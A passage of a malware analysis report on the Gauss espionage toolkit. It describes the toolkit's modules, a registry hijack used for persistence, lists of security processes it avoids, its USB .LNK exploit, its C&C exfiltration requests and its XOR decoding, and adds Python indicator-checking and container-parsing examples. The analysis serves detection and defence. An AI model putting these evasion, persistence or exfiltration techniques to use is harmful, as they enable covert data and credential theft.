    Gauss: Abnormal Distribution

    • Introduction
    • Executive Summary
    • Infection stats
    • Architecture
    • Wmiqry32/Wmihlp32.dll aka ShellHW
    • Dskapi.ocx
    • Smdk.ocx
    • McDmn.ocx
    • Lanhlp32.ocx
    • Devwiz.ocx
    • Winshell.ocx
    • Windig.ocx
    • Gauss C&C Information
    • Timeline
    • Files list
    • Conclusion

       You can download a PDF version of this article here.

    Introduction

    While analyzing the Flame malware that we detected in May 2012, Kaspersky Lab experts identified some distinguishing features of Flame's modules. Based on those features, we discovered that in 2009, the first variant of the Stuxnet worm included a module that was created based on the Flame platform. This indicates that there was some form of collaboration between the groups that developed the Flame and Tilded (Stuxnet/Duqu) platforms.

    Based on the results of a detailed analysis of Flame, we continued to actively search for new, unknown components. A more in-depth analysis conducted in June 2012 resulted in the discovery of a new, previously unknown malware platform that uses a modular structure resembling that of Flame, a similar code base and system for communicating to C&C servers, as well as numerous other similarities to Flame.

    In our opinion, all of this clearly indicates that the new platform which we discovered and which we called 'Gauss,' is another example of a cyber-espionage toolkit based on the Flame platform.

    Gauss is a project developed in 2011-2012 along the same lines as the Flame project. The malware has been actively distributed in the Middle East for at least the past 10 months. The largest number of Gauss infections has been recorded in Lebanon, in contrast to Flame, which spread primarily in Iran.

    Functionally, Gauss is designed to collect as much information about infected systems as possible, as well as to steal credentials for various banking systems and social network, email and IM accounts. The Gauss code includes commands to intercept data required to work with several Lebanese banks - for instance, Bank of Beirut, Byblos Bank, and Fransabank.

    Curiously, several Gauss modules are named after famous mathematicians. The platform includes modules that go by the names 'Gauss', 'Lagrange', 'Godel', 'Tailor', 'Kurt' (in an apparent reference to Godel). The Gauss module is responsible for collecting the most critical information, which is why we decided to name the entire toolkit after it.

    Gauss is a much more widespread threat than Flame. However, we have found no self-replication functionality in the modules that we have seen to date, which leaves open the question of its original attack vector.

    Executive Summary

    The first known Gauss infections date back to September-October 2011. During that period, the Gauss authors modified different modules multiple times. They also changed command server addresses. In the middle of July 2012, when we had already discovered Gauss and were studying it, the command servers went offline.

    Gauss is designed to collect information and send the data collected to its command-and-control servers. Information is collected using various modules, each of which has its own unique functionality:

    • Injecting its own modules into different browsers in order to intercept user sessions and steal passwords, cookies and browser history.
    • Collecting information about the computer's network connections.
    • Collecting information about processes and folders.
    • Collecting information about BIOS, CMOS RAM.
    • Collecting information about local, network and removable drives.
    • Infecting USB drives with a spy module in order to steal information from other computers.
    • Installing the custom Palida Narrow font (purpose unknown).
    • Ensuring the entire toolkit's loading and operation.
    • Interacting with the command and control server, sending the information collected to it, downloading additional modules.

    The spy module that works on USB drives uses an .LNK exploit for the CVE-2010-2568 vulnerability. The exploit is similar to the one used in the Stuxnet worm, but it is more effective. The module masks the Trojan's files on the USB drive without using a driver. It does not infect the system: information is extracted from it using a spy module (32- or 64-bit) and saved on the USB drive.

    Infection stats

    We began our investigation into Gauss in early June 2012. Based on data obtained through the Kaspersky Security Network, we noticed right away that the Trojan appeared to be widely distributed in three particular countries in the Middle East.

    Further observation later confirmed this three-country concentration. As of 31 July 2012, we had counted around 2500 unique PCs on which files from the Gauss collection have been found.

    Most infected countries

    The highest number of infections is recorded in Lebanon, with more than 1600 computers affected. The Gauss code (winshell.ocx) contains direct commands to intercept data required to work with Lebanese banks - including the Bank of Beirut, Byblos Bank and Fransabank.

    In Israel and the Palestinian Territory, 750 incidents have been recorded.

    Country                 Unique users
    Lebanon                 1660
    Israel                   483
    Palestinian Territory    261
    United States             43
    United Arab Emirates      11
    Germany                    5
    Egypt                      4
    Qatar                      4
    Jordan                     4
    Saudi Arabia               4
    Syria                      4

    Top 10 infected countries

    As can be seen in the above table, with the exceptions of the USA and Germany, all incidents took place in the Middle East. However, we believe that in the majority of cases linked to the USA and Germany the affected users were actually in the Middle East too - using VPNs (or the Tor anonymity network).

    In all, we've recorded incidents in 25 countries around the world; however, in all the countries outside the top 10 only one or two incidents have been recorded:


    Total infected users

    Regarding the spreading mechanism used by Gauss, the obtained data leave us with more questions unanswered than solved. The overall number of infections (around 2500) that we've detected could in reality just be a small portion of tens of thousands of infections, since our statistics only cover users of Kaspersky Lab products.

    When we compare the number of Gauss infections with those of other programs discovered earlier that have either common components or structures, we get the following figures:

    Name      Incidents (KL stats)   Incidents (approx.)
    Stuxnet   More than 100 000      More than 300 000
    Gauss     ~2500                  ?
    Flame     ~700                   ~5000-6000
    Duqu      ~20                    ~50-60

    Gauss has been spreading in the region for at least 10 months, in the course of which it has infected thousands of systems. On one hand, this is an uncharacteristically high number for targeted attacks similar to Duqu (it's possible that such a high number of incidents is due to the presence of a worm in one of the Gauss modules that we still don't know about). However, the infections have been predominantly within the boundaries of a rather small geographical region. If the malware had the ability to spread indiscriminately - for example, on USB sticks as was the case with Stuxnet - infections would have been detected in much greater numbers in other countries.

    Operating System Statistics

    Gauss was designed for 32-bit versions of the Windows operating system. Some of the modules do not work under Windows 7 SP1.

    OS                     % of total
    Windows 7              34.87
    XP Professional SP2    26.40
    XP Professional SP3    17.92
    Windows 7 SP1          10.77
    Windows 7 Home          2.15
    Vista Home SP1          1.71
    Vista Home              1.22
    Windows 7 Home SP1      0.88
    Vista Home SP2          0.83
    Vista                   0.64
    Vista SP2               0.39
    XP Home Edition         0.39
    Vista SP1               0.34
    Other                   1.47

    There is a separate spy module that operates on USB drives (see description of dskapi.ocx) and is designed to collect information from 64-bit systems.

    Architecture

    Gauss is a modular system. The number and combination of modules may change from one infected system to another. In the course of our research, we discovered the following modules:

    Module name   Location                        Description
    Cosmos        %system32%\devwiz.ocx           Collects information about CMOS, BIOS
    Kurt, Godel   %system32%\dskapi.ocx           Infects USB drives with data-stealing module
    Tailor        %system32%\lanhlp32.ocx         Collects information about network interfaces
    McDomain      %system32%\mcdmn.ocx            Collects information about user's domain
    UsbDir        %system32%\smdk.ocx             Collects information about computer's drives
    Lagrange      %system32%\windig.ocx           Installs a custom 'Palida Narrow' font
    Gauss         %system32%\winshell.ocx         Installs browser plugins that collect passwords and cookies
    ShellHW       %system32%\wbem\wmiqry32.ocx    Main loader and communication module
                  %system32%\wbem\wmihlp32.ocx

    The configuration of a specific combination of modules for each system is described in a special registry key. This technique, as well as the configuration structure itself, is similar to that used in Stuxnet/Duqu (storing of the configuration in the Windows registry) and Flame (configuration structure). Flame stores its configuration in the main module (mssecmgr.ocx).

    We created a special detection routine which helped us to discover various Gauss configurations based on registry settings on infected machines. We detected about 1700 such configurations in total, which gives the following picture of how the modules are distributed:

    Module             Number of PCs with the module (defined in config)
    UsbDir             1655
    Godel              1220
    Gauss               858
    Gauss_1.1           510
    Kurt (aka Godel)    433
    Gauss 1.0.8         318
    Tailor               28
    McDomain 1.2          5
    Cosmos                5
    Lagrange              3

    You can see three main modules, which are used in most cases - Gauss, Godel and UsbDir. Some examples of different configs:


    As mentioned above, we have been unable to discover the original infection vector and the dropper file that installs Gauss on the system. On all the systems we have studied, we dealt with a set of modules that was already installed. It is possible that during the initial infection only the ShellHW component is installed, which then installs the other modules.


    ShellHW (file name 'wmiqry32.dll'/'wmihlp32.dll') is the main component of the malware which ensures that all other Gauss modules are loaded when the malware starts and operate correctly.

    Comparison with Flame

    As we mentioned above, there are significant similarities in code and architecture between Gauss and Flame. In fact, it is largely due to these similarities that Gauss was discovered. We created the following table for a clearer understanding of these facts and proof of 'kinship' between the two attack platforms:

    Feature                                   Flame                      Gauss
    Modular architecture                      Yes                        Yes
    Using kernel drivers                      No                         No
    .OCX file extensions                      Yes                        Yes
    Configuration settings                    Predefined in main body    Stored in registry
    DLL injections                            Yes                        Yes
    Visual C++                                Yes                        Yes
    Encryption methods                        XOR                        XOR
    Using USB as storage                      Yes (hub001.dat)           Yes (.thumbs.db)
    Embedded LUA scripting                    Yes                        No
    Browser history/cookies stealer           Yes (soapr32/nteps32)      Yes (winshell)
    CVE-2010-2568 (.LNK exploit)              Yes (target.lnk)           Yes (target.lnk)
    C&C communication                         https                      https
    Log files/stolen data stored in %temp%    Yes                        Yes
    Zlib compression of collected data        Yes                        Yes

    In addition to the features listed above, there are considerable similarities in the operation of the Flame and Gauss C&C servers. The relevant analysis is provided in the C&C Communication section.

    There are more similarities in the code and data of the modules:

    • C++ runtime type information (RTTI) structures are encoded to hide the names of the standard library classes. The same encoded names can be found in both Flame and Gauss modules; e.g. the first RTTI structure contains the name 'AVnxsys_uwip', which most likely corresponds to the 'AVtype_info' class.


    • Most Flame and Gauss modules contain dozens of object initialization functions that construct string objects from encrypted data. The layout of these functions is almost identical.


    • String decryption routines ('GetDecryptedStrings', used in the initialization functions) are very similar, although not identical, because the layout of the structures holding the encrypted strings was changed.


    Wmiqry32/Wmihlp32.dll aka ShellHW

    Installed by: Unknown dropper

    Operates in two modes: installation and normal operation.

    File names            %system32%\wbem\wmiqry32.dll
                          %system32%\wbem\wmihlp32.dll
    Some known MD5        C3B8AD4ECA93114947C777B19D3C6059
                          08D7DDB11E16B86544E0C3E677A60E10
                          055AE6B8070DF0B3521D78E1B8D2FCE4
                          FA54A8D31E1434539FBB9A412F4D32FF
                          01567CA73862056304BB87CBF797B899
                          23D956C297C67D94F591FCB574D9325F
    Image Size            258 048 bytes
    Number of resources   7
    Resources             121, 131, 141, 151, 161, 171, 181
    Date of compilation   Jun 1 2011
                          Jul 16 2011
                          Jul 18 2011
                          Sep 28 2011
                          Oct 20 2011
    Related files         %temp%\~shw.tmp
                          %temp%\~stm.tmp

    Installation

    The module checks whether it was loaded by the 'lsass.exe' process and, if so, proceeds with the installation.

    It writes itself to the files %system32%\wbem\wmiqry32.dll and %system32%\wbem\wmihlp32.dll and modifies the system registry so that it is loaded instead of the %system32%\wbem\wbemsvc.dll file.

    To achieve this, it writes the following registry value:

    [HKCR\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32]
    Default = %system32%\wbem\wmihlp32.dll

    Operation

    The module is automatically loaded into processes that use wbemsvc.dll. When loaded into an 'svchost.exe' that was started with the '-k netsvc' parameter, it starts its main thread.

    The module creates the events 'ShellHWStop' and 'Global\ShellHWDetectionEvent' and the mutex 'ShellHWDetectionMutex'.
    The main thread exits if any of the following processes is found when it starts:

    LMon.exe sagui.exe RDTask.exe kpf4gui.exe
    ALsvc.exe pxagent.exe fsma32.exe licwiz.exe
    SavService.exe prevxcsi.exe alertwall.exe livehelp.exe
    SAVAdminService.exe csi-eui.exe mpf.exe lookout.exe
    savprogress.exe lpfw.exe mpfcm.exe emlproui.exe
    savmain.exe outpost.exe fameh32.exe emlproxy.exe
    savcleanup.exe filemon.exe AntiHook.exe endtaskpro.exe
    savcli.exe procmon.exe xfilter.exe netguardlite.exe
    backgroundscanclient.exe Sniffer.exe scfservice.exe oasclnt.exe
    sdcservice.exe acs.exe scfmanager.exe omnitray.exe
    sdcdevconx.exe aupdrun.exe spywareterminatorshield.exe onlinent.exe
    sdcdevconIA.exe sppfw.exe spywat~1.exe opf.exe
    sdcdevcon.exe spfirewallsvc.exe ssupdate.exe pctavsvc.exe
    configuresav.exe fwsrv.exe terminet.exe pctav.exe
    alupdate.exe opfsvc.exe tscutynt.exe pcviper.exe
    InstLsp.exe uwcdsvr.exe umxtray.exe persfw.exe
    CMain.exe dfw.exe updclient.exe pgaccount.exe
    CavAUD.exe ipatrol.exe webwall.exe privatefirewall3.exe
    CavEmSrv.exe pcipprev.exe winroute.exe protect.exe
    Cavmr.exe prifw.exe apvxdwin.exe rtt_crc_service.exe
    Cavvl.exe tzpfw.exe as3pf.exe schedulerdaemon.exe
    CavApp.exe privatefirewall3.exe avas.exe sdtrayapp.exe
    CavCons.exe pfft.exe avcom.exe siteadv.exe
    CavMud.exe armorwall.exe avkproxy.exe sndsrvc.exe
    CavUMAS.exe app_firewall.exe avkservice.exe snsmcon.exe
    UUpd.exe blackd.exe avktray.exe snsupd.exe
    cavasm.exe blackice.exe avkwctrl.exe procguard.exe
    CavSub.exe umxagent.exe avmgma.exe DCSUserProt.exe
    CavUserUpd.exe kpf4ss.exe avtask.exe avkwctl.exe
    CavQ.exe tppfdmn.exe aws.exe firewall.exe
    Cavoar.exe blinksvc.exe bgctl.exe THGuard.exe
    CEmRep.exe sp_rsser.exe bgnt.exe spybotsd.exe
    OnAccessInstaller.exe op_mon.exe bootsafe.exe xauth_service.exe
    SoftAct.exe cmdagent.exe bullguard.exe xfilter.exe
    CavSn.exe VCATCH.EXE cdas2.exe zlh.exe
    Packetizer.exe SpyHunter3.exe cmgrdian.exe adoronsfirewall.exe
    Packetyzer.exe wwasher.exe configmgr.exe scfservice.exe
    zanda.exe authfw.exe cpd.exe scfmanager.exe
    zerospywarele.exe dvpapi.exe espwatch.exe dltray.exe
    zerospywarelite_installer.exe clamd.exe fgui.exe dlservice.exe
    Wireshark.exe sab_wab.exe filedeleter.exe ashwebsv.exe
    tshark.exe SUPERAntiSpyware.exe firewall.exe ashdisp.exe
    rawshark.exe vdtask.exe firewall2004.exe ashmaisv.exe
    Ethereal.exe asr.exe firewallgui.exe ashserv.exe
    Tethereal.exe NetguardLite.exe gateway.exe aswupdsv.exe
    Windump.exe nstzerospywarelite.exe hpf_.exe avastui.exe
    Tcpdump.exe cdinstx.exe iface.exe avastsvc.exe
    Netcap.exe cdas17.exe invent.exe  
    Netmon.exe fsrt.exe ipcserver.exe  
    CV.exe VSDesktop.exe ipctray.exe  

    The module reads the registry value 'TimeStampForUI' under 'SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability'. It is an encrypted configuration file. The configuration contains the list of additional modules, their names, the DLL export names to call and the location of the modules' additional files.

    Module   Exports called                                                Module file                          Additional (log) file
    Gauss    ShellNotifyUser ShellNotifyUserEx SetWindowEvent InitShellEx  %systemroot%\system32\winshell.ocx   %temp%\ws1bin.dat
    Godel    InitCache RevertCache ValidateEntry CreateEntry               %windir%\system32\dskapi.ocx         %temp%\~gdl.tmp
    UsbDir   InitCache RevertCache ValidateEntry CreateEntry               %windir%\system32\smdk.ocx           %temp%\~mdk.tmp

    String values from config file (example)

    Every module is loaded and its export functions are called as specified in the configuration. Most of the actions are logged in an encrypted (with XOR) file '%temp%\~shw.tmp'.


    Sample of decrypted '~shw.tmp'

    After loading additional modules, it tries to acquire the same privileges as 'explorer.exe' and then starts its C&C interaction loop.

    Prior to communicating with the C&C, all the information from the other modules' log files is copied to the ~shw.tmp file. Paths to the log files are taken from the TimeStampForUI configuration file.

    As a result, at this stage ~shw.tmp becomes a universal container file containing all the stolen data.

    It checks for an Internet connection (https) by accessing the URLs specified in its resource 161.

    It then checks an https connection to www.google.com or www.update.windows.com. If '200 OK' is received in reply, it sends a request with the proxy server parameters taken from the prefs.js file of the Mozilla Firefox browser.

    When an Internet connection is available, it connects to its C&C servers that are specified in resource 131:


    The connection is established using the WinInet API and is performed in two stages:

    1. A GET request to the server. The response from the server is expected to contain new modules, commands or configuration data.
       GET [C&C domain]/userhome.php?sid=[random string]==&uid=VfHx8fHx8fHx8fHx8fHx8fHx8fE=
    2. A POST request to the server with the contents of the file '~shw.tmp', which contains all the data collected from the infected computer.


    The response from the server is decrypted using XOR with 0xACDC as the key. Exfiltrated data is compressed with Zlib.


    The C&C connection routine is controlled by a DWORD value that is read from the registry value:

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability] ShutdownIntervalSnapshotUI

    The initial value of the counter is read from resource 181 and is equal to 56. The counter is decremented every time the module fails to connect to its C&C server or to the servers specified in resource 161 and it is reset to the initial value after every successful connection to the C&C server. The module exits the C&C connection loop when the value of the counter becomes equal to zero.

    Resource   Description
    121        3 DWORDs, related to the list of AVs
    131        Hostnames and URLs of C&C servers
    141        List of AVs, firewalls, etc.
    151        Additional configuration DWORDs
    161        Hostnames and URLs of legitimate sites used to check the Internet connection
    171        String with cryptic identifiers
    181        DWORD, number of attempts to connect to the C&C before giving up

    File Version:        2001.12.4414.320
    Product Version:     5.1.2600.5788
    File OS:             WINDOWS32
    File Type:           DLL
    File SubType:        UNKNOWN
    Language/Code Page:  1033/1200
    CompanyName:         Microsoft Corporation
    FileDescription:     WMI COM Helper
    FileVersion:         2001.12.4414.320
    LegalCopyright:      Copyright (C) Microsoft Corp. 1995-1999
    LegalTrademarks:     Microsoft(R) is a registered trademark of Microsoft Corporation. Windows(TM) is a trademark of Microsoft Corporation
    ProductName:         WMI COM Services Help
    ProductVersion:      05.01.2600.5788

    Version info 'wmiqry32.dll'
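    The host artefacts described in this ShellHW section (the InProcServer32 hijack of the WBEM CLSID, the 'TimeStampForUI' and 'ShutdownIntervalSnapshotUI' values under the Reliability key) together with the module and log file names from the Architecture table are what a responder checks first. The Python below is an added example written for this page, not Kaspersky's or the CERT's tooling: it runs the checks over a registry snapshot and a file listing supplied as plain Python data, so it works offline and can later be fed from an exported hive or a collected directory listing. The %system32% and %temp% locations, the user profile and the whole sample input are constructed assumptions.

```python
import ntpath

# Indicators as described for the Gauss ShellHW loader and modules on this
# page. Drive letters, the user profile and the sample input are constructed
# for this example, not taken from a real infection.
WBEM_CLSID_KEY = r"HKCR\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32"
LEGIT_WBEM_DLL = r"\wbem\wbemsvc.dll"
RELIABILITY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability"
GAUSS_REG_VALUES = ("TimeStampForUI", "ShutdownIntervalSnapshotUI")

# Module files relative to %system32%, mapped to the module name.
GAUSS_MODULES = {
    r"wbem\wmiqry32.dll": "ShellHW",
    r"wbem\wmihlp32.dll": "ShellHW",
    "dskapi.ocx": "Godel/Kurt",
    "smdk.ocx": "UsbDir",
    "mcdmn.ocx": "McDomain",
    "lanhlp32.ocx": "Tailor",
    "devwiz.ocx": "Cosmos",
    "winshell.ocx": "Gauss",
    "windig.ocx": "Lagrange",
}
# Log and container files the modules write under %temp%.
GAUSS_TEMP_FILES = {"~shw.tmp", "~stm.tmp", "~gdl.tmp", "~mdk.tmp", "md.bak", "ws1bin.dat"}


def check_registry(reg):
    """reg maps a key path to {value_name: data}; "" is the default value."""
    findings = []
    inproc = reg.get(WBEM_CLSID_KEY, {}).get("", "")
    # ShellHW repoints the WBEM COM server at wmihlp32.dll; anything other
    # than the real wbemsvc.dll under %system32%\wbem is suspicious.
    if inproc and not inproc.lower().endswith(LEGIT_WBEM_DLL):
        findings.append("WBEM CLSID InProcServer32 hijacked -> " + inproc)
    reliability = reg.get(RELIABILITY_KEY, {})
    for name in GAUSS_REG_VALUES:
        if name in reliability:
            findings.append("Gauss config/counter value present: Reliability\\" + name)
    return findings


def check_files(paths, system32, temp):
    """paths: full file paths from a directory listing or triage image."""
    findings = []
    module_paths = {ntpath.join(system32, rel).lower(): name
                    for rel, name in GAUSS_MODULES.items()}
    for path in paths:
        low = path.lower()
        if low in module_paths:
            findings.append(module_paths[low] + " module on disk: " + path)
        elif ntpath.dirname(low) == temp.lower() and ntpath.basename(low) in GAUSS_TEMP_FILES:
            findings.append("Gauss log/container file: " + path)
    return findings


# Constructed sample input: a hijacked CLSID, both Reliability values and a
# few Gauss files, mixed with legitimate entries that must not be flagged.
SAMPLE_SYSTEM32 = r"C:\Windows\System32"
SAMPLE_TEMP = r"C:\Users\user\AppData\Local\Temp"
SAMPLE_REGISTRY = {
    WBEM_CLSID_KEY: {"": r"C:\Windows\System32\wbem\wmihlp32.dll"},
    RELIABILITY_KEY: {
        "TimeStampForUI": bytes(16),        # opaque encrypted blob, content irrelevant here
        "ShutdownIntervalSnapshotUI": 56,   # the initial counter value from resource 181
    },
}
SAMPLE_FILES = [
    r"C:\Windows\System32\wbem\wbemsvc.dll",
    r"C:\Windows\System32\wbem\wmihlp32.dll",
    r"C:\Windows\System32\dskapi.ocx",
    r"C:\Users\user\AppData\Local\Temp\~shw.tmp",
    r"C:\Users\user\AppData\Local\Temp\notes.txt",
]

if __name__ == "__main__":
    for line in check_registry(SAMPLE_REGISTRY) + check_files(SAMPLE_FILES, SAMPLE_SYSTEM32, SAMPLE_TEMP):
        print(line)
```

    The CLSID check deliberately flags any InProcServer32 target other than wbemsvc.dll rather than only wmihlp32.dll, because the file name is the easiest thing for a later variant to change; the Reliability value names and the module file names are matched exactly as the report gives them.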

    Dskapi.ocx

    Name of the module used in Gauss: 'Godel' or 'Kurt'.

    File names            %system32%\dskapi.ocx
    Some known MD5        ED5559B0C554055380D75C1D7F9C4424
                          E379270F53BA148D333134011AA3600C
                          EF83394D9600F6D2808E0E99B5F932CA
    Image Size            1 327 104 bytes
                          954 368 bytes
                          962 560 bytes
                          417 792 bytes
    Number of resources   2
    Resources             100, 101
    Date of compilation   28.09.2011
                          13.10.2011
                          01.11.2011
                          29.11.2011
    Related files         %temp%\~gdl.tmp
                          .thumbs.db
                          wabdat.dat
                          desktop.ini
                          target.lnk
                          System32.dat
                          System32.bin
                          .CatRoot.tmp

    Creates events: '{12258790-A76B}', 'Global\RasSrvReady'

    All functionality is implemented in 'RevertCache' export. The module starts its main thread and then returns. The main thread waits for the '{12258790-A76B}' event and continuously checks for the presence of anti-malware software.

    'ValidateEntry' signals the '{12258790-A76B}' event, allowing for the main thread to work for 3 seconds before terminating it.

    Writes log file: %temp%\~gdl.tmp

    The log file entries are compressed with Zlib.

    Reads the registry key HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum.

    Checks for running anti-malware products by name and exits if any of them is present:

    AVKProxy.exe
    AVKService.exe
    AVKTray.exe
    AVKWCtl.exe
    GDFirewallTray.exe
    GDFwSvc.exe
    GDScan.exe
    abcd.exe
    avp.exe
    fameh32.exe
    fch32.exe
    fsar32.exe
    fsav32.exe
    fsdfwd.exe
    fsgk32.exe
    fsgk32st.exe
    fsguidll.exe
    fshdll32.exe
    fsm32.exe
    fsma32.exe
    fsmb32.exe
    fsorsp.exe
    fspc.exe
    fsqh.exe
    fssm32.exe
    fsus.exe
    gsava.exe
    gssm32.exe
    vsmon.exe
    zapro.exe
    zlclient.exe

    It also exits if started on Windows 7 SP 1.

    By querying the disk enumeration in the registry, it also tries to identify whether each storage device is USB-connected by searching for the string 'USBSTOR' in its device information.

    When a drive contains '.thumbs.db' file, its contents are read and checked for the valid magic number 0xEB397F2B. If it matches, the module creates %commonprogramfiles%\system\wabdat.dat and writes the data to this file, and then deletes '.thumbs.db'.

    Then, it infects the USB drives by creating directories with the names .Backup0[D-M] and .Backup00[D-M]


    Infected USB root folder (before activation)

    Each directory contains a specially crafted desktop.ini file and a target.lnk file that exploits the LNK vulnerability.

    target.lnk

    Contents of desktop.ini:

    [.ShellClassInfo]
    CLSID = {0AFACED1-E828-11D1-9187-B532F1E9575D}
    CLSID2 = {0AFACED1-E828-11D1-9187-B532F1E9575D}
    UICLSID = {0AFACED1-E828-11D1-9187-B532F1E9575D}


    Listing of .Backup0* directory

    In the root directory of the drive it creates files 'System32.dat' and 'System32.bin', the payload DLLs, and the '.thumbs.db' file. The payloads are stored as resources and encrypted with a simple XOR routine.



    #include <stdint.h>

    /* Resources 100/101 are decrypted in place: each ciphertext byte is XORed
       with the previous ciphertext byte; the first byte is XORed with 0xCC. */
    static int decrypt(uint8_t *data, unsigned int dataLen)
    {
        uint32_t acc = 0xCC;
        for (unsigned int i = 0; i < dataLen; i++)
        {
            uint8_t acc2 = data[i];   /* keep the ciphertext byte ...          */
            data[i] ^= acc;           /* ... XOR with the previous one ...     */
            acc = acc2;               /* ... and use it as the next key byte   */
        }
        return 0;
    }


    Resource   File name                     Description
    100        System32.dat (.CatRoot.tmp)   32-bit payload
    101        System32.bin (.CatRoot.tmp)   64-bit payload

    USB Payload

    Both 32-bit and 64-bit DLLs implement the same functionality. When loaded using the LNK vulnerability, they start a main thread and return. The main thread copies the payload to %TEMP% directory and loads itself again. When loaded from %TEMP%, it creates a mutex 'Isvp4003ltrEvent', patches the 'NtQueryDirectoryFile' function in ntdll.dll so that it hides its files and then sends the 'F5' key event to windows of classes 'SysListView32', 'SysTreeView32', 'DirectUIHWND', causing Explorer directory listings to refresh. This hides the files. It also waits for the event 'Global\RasSrvReady'.

    Then, it retrieves the following data from the system:

    • Version of the Windows OS
    • Workstation info
    • Network adapter information
    • Routing table
    • Process list
    • Environment variables and disk information
    • List of visible network shares
    • Network proxy information
    • List of visible MS SQL servers
    • URL cache

    All this information is encoded and appended to the file '.thumbs.db' on the infected storage. This file also contains a TTL (time to live) value that is decremented by 1 each time the payload starts from the infected storage. When this counter reaches zero, the payload disinfects the media by removing the '.Backup0*' directories and the 'System32.dat' and 'System32.bin' files, leaving the '.thumbs.db' file with the collected information. The known initial TTL value is 30.

    There are several 'special' versions of the payload. They contain additional PE sections with names '.exsdat,' '.exrdat,' and '.exdat'. These sections are encrypted with RC4. The encryption key is derived from an MD5 hash performed 10000 times on a combination of '%PATH%' environment string and name of the directory in %PROGRAMFILES%.

    The RC4 key is not yet known, neither is the contents of these sections. The payload also contains a binary resource 100 that is also encrypted.

    .thumbs.db file

    This is a container for data stolen by the 'dskapi' payload.

    Offset      Data
    0           Magic number: 0xEB397F2B
    4           TTL counter
    (follows)   Encoded data

    The encoded data consists of arrays of encoded strings, separated by a magic value 0xFF875686.

    Offset   Description
    0        Magic number:
             0xFF875686                          end of an array of records; search for the next magic
             0xFF875683 XOR (recordLength + 5)   start of a record
    4        Encrypted string data, recordLength bytes

    Every record is encrypted by a simple algorithm using the character's position and the record length and can be decrypted with the following code (ptr points at the start of the file data, i is the offset of the record body):

    #include <stdint.h>

    static void decrypt_record(uint8_t *ptr, unsigned int i, unsigned int recordLen)
    {
        for (unsigned int j = 0; j < recordLen; j++)
        {
            ptr[i + j] ^= recordLen;   /* only the low byte matters: ptr[] is 8-bit */
            ptr[i + j] -= j;           /* wraps modulo 256 */
        }
    }
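    A parser for the '.thumbs.db' container as laid out in the two tables above, given here as an added example and not as code from the report. It assumes little-endian DWORDs for the magic, the TTL and the record headers, which the report does not state, and that arrays follow each other with no padding; the sample container is constructed by the writer in the same block, not taken from a real drive. decrypt_record is the Python form of the C fragment above; encrypt_record is derived by inverting it so the writer can produce test input.

```python
import struct

THUMBS_MAGIC = 0xEB397F2B  # file header magic (assumed little-endian on disk)
ARRAY_END = 0xFF875686     # separator after an array of records
RECORD_BASE = 0xFF875683   # record header = RECORD_BASE XOR (recordLength + 5)


def record_header(record_len):
    """Header DWORD that precedes a record of record_len bytes."""
    return RECORD_BASE ^ (record_len + 5)


def decrypt_record(data, record_len):
    """Python form of the C fragment above: XOR with the record length (low
    byte only, since the C code works on uint8_t), then subtract the byte's
    position, modulo 256."""
    return bytes(((b ^ (record_len & 0xFF)) - j) & 0xFF for j, b in enumerate(data))


def encrypt_record(plain):
    """Forward direction, obtained by inverting decrypt_record."""
    n = len(plain)
    return bytes((((b + j) & 0xFF) ^ (n & 0xFF)) for j, b in enumerate(plain))


def parse_thumbs_db(blob):
    """Return (ttl, arrays): arrays is a list of record arrays, each a list
    of decoded byte strings. Raises ValueError on anything off-format."""
    if len(blob) < 8:
        raise ValueError("too short for the 8-byte header")
    magic, ttl = struct.unpack_from("<II", blob, 0)
    if magic != THUMBS_MAGIC:
        raise ValueError("bad magic 0x%08X" % magic)
    arrays, current, off = [], [], 8
    while off + 4 <= len(blob):
        tag = struct.unpack_from("<I", blob, off)[0]
        off += 4
        if tag == ARRAY_END:          # a zero-length record would look the same
            arrays.append(current)
            current = []
            continue
        # A record header differs from RECORD_BASE only in the bits of
        # (recordLength + 5); a tag that touches the high bits is not one.
        delta = tag ^ RECORD_BASE
        if delta > 0xFFFF or delta < 5 or off + delta - 5 > len(blob):
            raise ValueError("unexpected tag 0x%08X at offset %d" % (tag, off - 4))
        rec_len = delta - 5
        current.append(decrypt_record(blob[off:off + rec_len], rec_len))
        off += rec_len
    if current:                       # records after the last separator
        arrays.append(current)
    return ttl, arrays


def build_thumbs_db(ttl, arrays):
    """Writer used to construct sample input; arrays are laid out back to
    back with no padding, which is an assumption of this example."""
    out = bytearray(struct.pack("<II", THUMBS_MAGIC, ttl))
    for records in arrays:
        for s in records:
            out += struct.pack("<I", record_header(len(s)))
            out += encrypt_record(s)
        out += struct.pack("<I", ARRAY_END)
    return bytes(out)


# Constructed sample: two arrays of the kind of host data the payload
# collects, with the known initial TTL of 30.
SAMPLE_ARRAYS = [
    [b"Microsoft Windows XP", b"WORKSTATION01"],
    [b"C:\\ fixed", b"E:\\ removable"],
]
SAMPLE_THUMBS_DB = build_thumbs_db(30, SAMPLE_ARRAYS)

if __name__ == "__main__":
    ttl, arrays = parse_thumbs_db(SAMPLE_THUMBS_DB)
    print("TTL:", ttl)
    for n, records in enumerate(arrays):
        print("array", n, [r.decode() for r in records])
```

    The high-bits check on the tag is what lets the parser stop on garbage instead of reading a bogus length; because the report says a reader "must search for the next Magic" after a separator, a version for real drives would scan forward for the next acceptable tag there rather than raise.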


    File Version:        5.1.3700.0
    Product Version:     5.1.3700.0
    File OS:             NT (WINDOWS32)
    File Type:           DRV
    File SubType:        DRV SOUND
    File Date:           00:00:00  00/00/0000
    Language/Code Page:  1033/1200
    CompanyName:         Microsoft Corporation
    FileDescription:     Disk Helper
    FileVersion:         5.1.3700.0
    InternalName:        dskapi.ocx
    LegalCopyright:      © Microsoft Corporation. All rights reserved.
    OriginalFilename:    dskapi.ocx
    ProductName:         Microsoft(R) Windows(R) Operating System
    ProductVersion:      5.1.3700.0

    Version info 'dskapi.ocx'

    Smdk.ocx

    Name of the module used in Gauss: 'UsbDir'

    File names            %system32%\smdk.ocx
    Some known MD5        5604A86CE596A239DD5B232AE32E02C6
                          90F5C45420C295C73067AF44028CE0DD
    Image Size            212 992 bytes
    Date of compilation   27.09.2011
                          17.10.2011
    Related files         %temp%\~mdk.tmp

    Creates events: '{B336C220-B158}', 'Global\SmSrvReady'
